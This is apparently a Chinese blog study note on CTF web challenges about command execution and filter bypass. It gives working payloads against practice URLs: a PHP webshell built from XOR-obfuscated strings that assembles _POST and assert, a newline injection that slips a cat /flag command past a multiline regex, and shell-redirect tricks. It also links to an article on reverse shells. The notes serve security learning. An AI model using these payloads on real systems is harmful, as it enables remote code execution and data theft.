Web学习_命令执行、payload绕过

无字母绕过

单行匹配无字母绕过,异或

构造shell,post和assert

通过post执行函数,

http://123.57.240.205:4003/?mess=$_=%27_%27.(%af%b0%ac%ab^%ff%ff%ff%ff);$__=(%9e%8c%8c%9a%8d%8b^%ff%ff%ff%ff%ff%ff);$___=$$_;$__($___[0]);

0=readfile('/flag');

无数字字母绕过

正则:/m多行匹配

%0a  换行符

payload:http://123.57.240.205:4005/?path=%0a1.txt%0acat%20/flag

命令执行

重定向创建cat文件,?cmd=>cat

重定向将目录下文件名写入a        *>a

*即为cat flag.php


考察linux命令操作


反弹shell几种方法

https://blog.csdn.net/qiuyeyijian/article/details/102993592

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容